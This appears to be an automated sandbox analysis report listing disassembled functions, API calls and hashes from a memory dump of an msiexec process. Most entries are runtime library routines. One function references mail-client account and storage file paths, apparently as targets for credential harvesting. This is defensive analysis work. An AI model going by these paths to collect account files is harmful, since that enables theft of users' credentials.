                                                                    • Instruction Fuzzy Hash: 05313B31E00304DFEB21AA38D940F66BBFFAF04690F1448DDE949D7251DA31A9909B3C

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _free.LIBCMT ref: 234B59EA
                                                                      • Part of subcall function 234B571E: HeapFree.KERNEL32(00000000,00000000,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?), ref: 234B5734
                                                                      • Part of subcall function 234B571E: GetLastError.KERNEL32(?,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?,?), ref: 234B5746
                                                                    • _free.LIBCMT ref: 234B59F6
                                                                    • _free.LIBCMT ref: 234B5A01
                                                                    • _free.LIBCMT ref: 234B5A0C
                                                                    • _free.LIBCMT ref: 234B5A17
                                                                    • _free.LIBCMT ref: 234B5A22
                                                                    • _free.LIBCMT ref: 234B5A2D
                                                                    • _free.LIBCMT ref: 234B5A38
                                                                    • _free.LIBCMT ref: 234B5A43
                                                                    • _free.LIBCMT ref: 234B5A51
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 995f0af09cd69e6b56058c12185304fc54a332b27d6e5be553000fbda202d23a
                                                                    • Instruction ID: cd1936ddd4f911582dfa8622ac5f74d74198b2230eb87dc4babfc37e6af2ce4d
                                                                    • Opcode Fuzzy Hash: 995f0af09cd69e6b56058c12185304fc54a332b27d6e5be553000fbda202d23a
                                                                    • Instruction Fuzzy Hash: 1511897AA10248FFCB21EF54C841CDDBFB6EF18650F5541E9B9088F225DA31DA609BA4

                                                                    Control-flow Graph (interactive graph not reproduced; legend: Executed / Not Executed)
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer
                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                    • API String ID: 3527080286-3064271455
                                                                    • Opcode ID: 494515c56e84f023cdb0da3ab4cd90ad6dfe8c33c786fc62abdc2b9d91a07266
                                                                    • Instruction ID: ad595cdddfbdccc715996ddee800fd4c05f7a08285615fdf99d3a40a03bbe475
                                                                    • Opcode Fuzzy Hash: 494515c56e84f023cdb0da3ab4cd90ad6dfe8c33c786fc62abdc2b9d91a07266
                                                                    • Instruction Fuzzy Hash: 7C517C74D04649CBCF00EFA8DA8859CBBB6FB5D210F1445C7D6A1A6354DB398A25CB3C

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D1B
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 234B1D37
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D4B
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D58
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D72
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D7D
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 1454806937-0
                                                                    • Opcode ID: 3f65644328512fdb9dc07a0b2fbb57a3ec1b03396bdb8c3c147daa66bdf41edd
                                                                    • Instruction ID: 0b8e24960f7b122243ba5d44827fcd3ba4486d6d4a2ec08e2ad8baf62d08d258
                                                                    • Opcode Fuzzy Hash: 3f65644328512fdb9dc07a0b2fbb57a3ec1b03396bdb8c3c147daa66bdf41edd
                                                                    • Instruction Fuzzy Hash: 7A212F71D4121CAFDB14AFA48C8CEEB76FDEB29358F0409E6F511E2140EA749E468A74

                                                                    Control-flow Graph (interactive graph not reproduced; legend: Executed / Not Executed)
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,234B9C07,?,00000000,?,00000000,00000000), ref: 234B94D4
                                                                    • __fassign.LIBCMT ref: 234B954F
                                                                    • __fassign.LIBCMT ref: 234B956A
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 234B9590
                                                                    • WriteFile.KERNEL32(?,?,00000000,234B9C07,00000000,?,?,?,?,?,?,?,?,?,234B9C07,?), ref: 234B95AF
                                                                    • WriteFile.KERNEL32(?,?,?,234B9C07,00000000,?,?,?,?,?,?,?,?,?,234B9C07,?), ref: 234B95E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: d46432a19c7b9a53e443a1203b7e559fa6adb189365253872be039119fb70739
                                                                    • Instruction ID: dc195f737faa2a4faa202ef795a6ae13cef3f71c1be6663c4e83238263bc0652
                                                                    • Opcode Fuzzy Hash: d46432a19c7b9a53e443a1203b7e559fa6adb189365253872be039119fb70739
                                                                    • Instruction Fuzzy Hash: 0B51D371D00209AFDB10CFA8C891BEEBBFAEF19300F1445DAE955E7291E7309941CB68

                                                                    Control-flow Graph (interactive graph not reproduced; legend: Executed / Not Executed)
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 234B339B
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 234B33A3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 234B3431
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 234B345C
                                                                    • _ValidateLocalCookies.LIBCMT ref: 234B34B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 50f6786f3ca81f17e0ff532f2c313da3e384ae2b1cbad91a7b551f36a7213104
                                                                    • Instruction ID: 41fe71f86de7baa0e8e911b81c31cd479cbeedc19a76e568c2be27030714fb2d
                                                                    • Opcode Fuzzy Hash: 50f6786f3ca81f17e0ff532f2c313da3e384ae2b1cbad91a7b551f36a7213104
                                                                    • Instruction Fuzzy Hash: 6041A534E00208AFCB11DF6AC840A9EBBB6AF5522CF1881D9D9159B351D735DA05CBB8

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 234B9221: _free.LIBCMT ref: 234B924A
                                                                    • _free.LIBCMT ref: 234B92AB
                                                                      • Part of subcall function 234B571E: HeapFree.KERNEL32(00000000,00000000,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?), ref: 234B5734
                                                                      • Part of subcall function 234B571E: GetLastError.KERNEL32(?,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?,?), ref: 234B5746
                                                                    • _free.LIBCMT ref: 234B92B6
                                                                    • _free.LIBCMT ref: 234B92C1
                                                                    • _free.LIBCMT ref: 234B9315
                                                                    • _free.LIBCMT ref: 234B9320
                                                                    • _free.LIBCMT ref: 234B932B
                                                                    • _free.LIBCMT ref: 234B9336
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                    • Instruction ID: 17c274ae2f198948af8347cc2f7b3dda3259f1ec998335ca6caacf44373e6d45
                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                    • Instruction Fuzzy Hash: 22117231D40708EED974A7B0DC45FCBBBBE9F14B00F404CECA6D976052DA24B5144665

                                                                    Control-flow Graph (interactive graph not reproduced; legend: Executed / Not Executed)
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,234B6FFD,00000000,?,?,?,234B8A72,?,?,00000100), ref: 234B887B
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,234B8A72,?,?,00000100,5EFC4D8B,?,?), ref: 234B8901
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 234B89FB
                                                                    • __freea.LIBCMT ref: 234B8A08
                                                                      • Part of subcall function 234B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 234B5702
                                                                    • __freea.LIBCMT ref: 234B8A11
                                                                    • __freea.LIBCMT ref: 234B8A36
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1414292761-0
                                                                    • Opcode ID: c96876d546bc6eeee25240c722354faeff922279d778f3bbf9902d183d6f542d
                                                                    • Instruction ID: 963c91341b3904baf8933b04c0fa6badfa3ffbfb2699d73c86eb5ad3a20cb502
                                                                    • Opcode Fuzzy Hash: c96876d546bc6eeee25240c722354faeff922279d778f3bbf9902d183d6f542d
                                                                    • Instruction Fuzzy Hash: 7551E372E10286EFDB259E74CC40EAB77BBEB54650F1446E9FD04E6240EB34DC508AB8

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _strlen.LIBCMT ref: 234B1607
                                                                    • _strcat.LIBCMT ref: 234B161D
                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,234B190E,?,?,00000000,?,00000000), ref: 234B1643
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,234B190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 234B165A
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,234B190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 234B1661
                                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,234B190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 234B1686
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                    • String ID:
                                                                    • API String ID: 1922816806-0
                                                                    • Opcode ID: 9da3216b57563bea12272ddee90817977cc167d906efe2242eaf598e022a1ccf
                                                                    • Instruction ID: e4fc07295ecc07659e87a22a72101ebde9c47343c9a16f45ae1db8817b820eba
                                                                    • Opcode Fuzzy Hash: 9da3216b57563bea12272ddee90817977cc167d906efe2242eaf598e022a1ccf
                                                                    • Instruction Fuzzy Hash: AC21C436E00204ABCB149F64DC81AEE77B9EF98614F1444EAE504AB241EE34A54287B9
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 234B1038
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 234B104B
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 234B1061
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 234B1075
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 234B1090
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 234B10B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                    • String ID:
                                                                    • API String ID: 3594823470-0
                                                                    • Opcode ID: f79eb83b9a9d5f90546a71ae9a767ffe660b46da6742c359085c47659173081d
                                                                    • Instruction ID: d24f02240aa83be3258c2ab2e8e2af531f9d400f048fba88510a79dd8949b90f
                                                                    • Opcode Fuzzy Hash: f79eb83b9a9d5f90546a71ae9a767ffe660b46da6742c359085c47659173081d
                                                                    • Instruction Fuzzy Hash: 08217136D003189BCF24AF65DC48DDB377AEF44218F1045D6E959971A1DE309A86CB64
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,234B3518,234B23F1,234B1F17), ref: 234B3864
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 234B3872
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 234B388B
                                                                    • SetLastError.KERNEL32(00000000,?,234B3518,234B23F1,234B1F17), ref: 234B38DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: cdeecca7093fee91a59683df0902c7fa00d62c0f7b24d46199ad15e03aa44997
                                                                    • Instruction ID: 4590bfc2dee68202c5e903d42ab3899cebfc0174dcea7ebb9770c363148f70a6
                                                                    • Opcode Fuzzy Hash: cdeecca7093fee91a59683df0902c7fa00d62c0f7b24d46199ad15e03aa44997
                                                                    • Instruction Fuzzy Hash: E601B533E0D7115EE214397B6C8495626FBDB35A7D72002FEE110651D5EE1AC801927D
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,234B6C6C), ref: 234B5AFA
                                                                    • _free.LIBCMT ref: 234B5B2D
                                                                    • _free.LIBCMT ref: 234B5B55
                                                                    • SetLastError.KERNEL32(00000000,?,?,234B6C6C), ref: 234B5B62
                                                                    • SetLastError.KERNEL32(00000000,?,?,234B6C6C), ref: 234B5B6E
                                                                    • _abort.LIBCMT ref: 234B5B74
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 3160817290-0
                                                                    • Opcode ID: ff56dee2d78bc923bbeff1805234774b9f95dbd9376059ace12f2629b836820c
                                                                    • Instruction ID: 157f3a265290075eab0a925330134718cd1a0dfd955a0063f89daed9550a1bd0
                                                                    • Opcode Fuzzy Hash: ff56dee2d78bc923bbeff1805234774b9f95dbd9376059ace12f2629b836820c
                                                                    • Instruction Fuzzy Hash: 0FF0A936D086006FD25637356C04E0AE67B9BE5D65B1801D9F924A6281FE288502417C
                                                                    APIs
                                                                      • Part of subcall function 234B1E89: lstrlenW.KERNEL32(?,?,?,?,?,234B10DF,?,?,?,00000000), ref: 234B1E9A
                                                                      • Part of subcall function 234B1E89: lstrcatW.KERNEL32(?,?,?,234B10DF,?,?,?,00000000), ref: 234B1EAC
                                                                      • Part of subcall function 234B1E89: lstrlenW.KERNEL32(?,?,234B10DF,?,?,?,00000000), ref: 234B1EB3
                                                                      • Part of subcall function 234B1E89: lstrlenW.KERNEL32(?,?,234B10DF,?,?,?,00000000), ref: 234B1EC8
                                                                      • Part of subcall function 234B1E89: lstrcatW.KERNEL32(?,234B10DF,?,234B10DF,?,?,?,00000000), ref: 234B1ED3
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 234B122A
                                                                      • Part of subcall function 234B173A: _strlen.LIBCMT ref: 234B1855
                                                                      • Part of subcall function 234B173A: _strlen.LIBCMT ref: 234B1869
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                    • API String ID: 4036392271-1520055953
                                                                    • Opcode ID: 5d4c8022e0981fb45327eab84c4a28a4578745905d0e598d7e461d8de038f16c
                                                                    • Instruction ID: 153f2965c232ca08ee1815932543684987cc8cde0f319e4c9bf71978b2e06a66
                                                                    • Opcode Fuzzy Hash: 5d4c8022e0981fb45327eab84c4a28a4578745905d0e598d7e461d8de038f16c
                                                                    • Instruction Fuzzy Hash: 2021A269E103486AE7249694EC81AED733AEF50B14F0015DAF604EB194E6B11982876C
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,234B4AEA,?,?,234B4A8A,?,234C2238,0000000C,234B4BBD,00000000,00000000), ref: 234B4B59
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 234B4B6C
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,234B4AEA,?,?,234B4A8A,?,234C2238,0000000C,234B4BBD,00000000,00000000,?,234B2082), ref: 234B4B8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: bc424f8e927b480140a714573d84c64c9d0380cace40958cc2f144a1dd4c698f
                                                                    • Instruction ID: 7d12152415e5380a958b37b951c116f7e15fa6883d0a971be20d9a7f952f8dc8
                                                                    • Opcode Fuzzy Hash: bc424f8e927b480140a714573d84c64c9d0380cace40958cc2f144a1dd4c698f
                                                                    • Instruction Fuzzy Hash: AAF0AF31E04208BFCB15AF90C808F9DBFFAEF15365F4001E9EA05A2250EF348941CAA8
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 234B715C
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 234B717F
                                                                      • Part of subcall function 234B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 234B5702
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 234B71A5
                                                                    • _free.LIBCMT ref: 234B71B8
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 234B71C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    • Opcode ID: 6fd5ec7032c7ec9ce6b287808e55766d022ff179ea51b9237f371304be586c11
                                                                    • Instruction ID: 71e9af63e5605a060b9dbb79eb78e74bac0a62409eb0302c63ca01c811fe44d7
                                                                    • Opcode Fuzzy Hash: 6fd5ec7032c7ec9ce6b287808e55766d022ff179ea51b9237f371304be586c11
                                                                    • Instruction Fuzzy Hash: 40018476E022157FA3112AB64C88D7B6E7FDED6DA431801EEBE04D7340EE648C0281BC
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000000,234B636D,234B5713,00000000,?,234B2249,?,?,234B1D66,00000000,?,?,00000000), ref: 234B5B7F
                                                                    • _free.LIBCMT ref: 234B5BB4
                                                                    • _free.LIBCMT ref: 234B5BDB
                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B5BE8
                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B5BF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: 34491a8ff68383d8dadb13d2e40015e52b2fb43f5721c3bbaf9be4999ffe6f08
                                                                    • Instruction ID: b8bd124ecee295854e85c02b6d5e8c1dbb1ca5dc9a4401f20b6ba4244d3297b1
                                                                    • Opcode Fuzzy Hash: 34491a8ff68383d8dadb13d2e40015e52b2fb43f5721c3bbaf9be4999ffe6f08
                                                                    • Instruction Fuzzy Hash: E301F476E08701AFC31736351C84E1BBABF9BE697471800E9F825A6242EE68C902413C
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,234B10DF,?,?,?,00000000), ref: 234B1E9A
                                                                    • lstrcatW.KERNEL32(?,?,?,234B10DF,?,?,?,00000000), ref: 234B1EAC
                                                                    • lstrlenW.KERNEL32(?,?,234B10DF,?,?,?,00000000), ref: 234B1EB3
                                                                    • lstrlenW.KERNEL32(?,?,234B10DF,?,?,?,00000000), ref: 234B1EC8
                                                                    • lstrcatW.KERNEL32(?,234B10DF,?,234B10DF,?,?,?,00000000), ref: 234B1ED3
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcat
                                                                    • String ID:
                                                                    • API String ID: 493641738-0
                                                                    • Opcode ID: 59da4ff67337af478759c4bc212a7b218696932394163b407202f621b394952e
                                                                    • Instruction ID: 960104a7b56f4cecaa65696c751b9b6a391f1e674bfe44db6beef4f8663196e4
                                                                    • Opcode Fuzzy Hash: 59da4ff67337af478759c4bc212a7b218696932394163b407202f621b394952e
                                                                    • Instruction Fuzzy Hash: 18F08926900214BBD7253B29AC85E7F777DEFD6A64F04009AFA0893190EB55584292B9
                                                                    APIs
                                                                    • _free.LIBCMT ref: 234B91D0
                                                                      • Part of subcall function 234B571E: HeapFree.KERNEL32(00000000,00000000,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?), ref: 234B5734
                                                                      • Part of subcall function 234B571E: GetLastError.KERNEL32(?,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?,?), ref: 234B5746
                                                                    • _free.LIBCMT ref: 234B91E2
                                                                    • _free.LIBCMT ref: 234B91F4
                                                                    • _free.LIBCMT ref: 234B9206
                                                                    • _free.LIBCMT ref: 234B9218
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: a0cea8e9f5e8d1f3900c3a8f7e1803776bd5e2885c5eafa0719e18f24daa87c3
                                                                    • Instruction ID: 9e7835ce53a17dab8a33cb8b898f5761906e422cdc93609728a1edabf70caba7
                                                                    • Opcode Fuzzy Hash: a0cea8e9f5e8d1f3900c3a8f7e1803776bd5e2885c5eafa0719e18f24daa87c3
                                                                    • Instruction Fuzzy Hash: DCF06271E152409B8664FB94D5C4C06BBFBEB24714B544CC9F949E7600CF38F8908A7C
                                                                    APIs
